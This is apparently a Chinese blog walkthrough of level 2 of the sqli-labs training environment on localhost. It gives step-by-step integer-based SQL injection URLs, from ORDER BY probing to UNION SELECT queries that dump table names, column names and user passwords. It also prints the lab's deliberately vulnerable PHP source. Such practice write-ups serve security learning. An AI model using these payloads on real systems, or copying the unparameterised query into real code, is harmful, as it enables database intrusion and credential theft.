您好,登錄后才能下訂單哦!
接上篇博客:https://blog.51cto.com/tdcqvip/2060816
來到第二關(guān):
http://127.0.0.1/sqli-labs-master/Less-2/
訪問http://127.0.0.1/sqli-labs-master/Less-2/?id=1
判斷是否有注入點(diǎn):
and 1 = 1 返回正常
http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1 = 1 %23
and 1 = 2 返回失敗
http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1 = 2 %23
說明存在注入點(diǎn):
order by n 查看字段
當(dāng)n=3時(shí)返回正確
http://127.0.0.1/sqli-labs-master/Less-2/?id=1 order by 3 %23
當(dāng)=4時(shí)返回錯(cuò)誤
http://127.0.0.1/sqli-labs-master/Less-2/?id=1 order by 4 %23
說明字段是3
用union select 進(jìn)行聯(lián)合查詢:
并用報(bào)錯(cuò)的方式顯示顯示位:
http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,2,3 %23
通過上圖可以看到顯示位在2,3上。
用version()和database()查看php版本和當(dāng)前網(wǎng)站用的數(shù)據(jù)庫名字
我們通過上圖可以看到數(shù)據(jù)庫是“security” 版本是5.5.53
接下來我們查看數(shù)據(jù)庫security下的表:
http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'security' %23
通過上圖可以看到有users表
查看users表里的列
http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1, group_concat(column_name),3 from information_schema.columns where table_name = 'users' %23
接下來就是查看username和password里的內(nèi)容:
http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1,username,password from users where id = 2 %23
結(jié)束:
聲明:源代碼被我改動了,所以在注入的時(shí)候才會顯示出來查詢語句
接下來看看源代碼:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Less-2 **Error Based- Intiger**</title> </head> <body bgcolor="#000000"> <div style=" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome <font color="#FF0000"> Dhakkan </font><br> <font size="3" color="#FFFF00"> <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables if(isset($_GET['id'])) { $id=$_GET['id']; //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id."\n"); fclose($fp); // connectivity $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); echo $sql; echo "<br>"; if($row) { echo "<font size='5' color= '#99FF00'>"; echo 'Your Login name:'. $row['username']; echo "<br>"; echo 'Your Password:' .$row['password']; echo "</font>"; } else { echo '<font color= "#FFFF00">'; print_r(mysql_error()); echo "</font>"; } } else { echo "Please input the ID as parameter with numeric value"; } ?> </font> </div></br></br></br><center> <img src="../images/Less-2.jpg" /></center> </body> </html>
通過源代碼我們可以看到,在連接數(shù)據(jù)庫查詢的時(shí)候并沒有進(jìn)行任何過濾
與第一關(guān)不同的地方就是
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
這句,沒有“''”符號。
利用方式大致相同。
第三關(guān)盡快更新
微信公眾號:
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。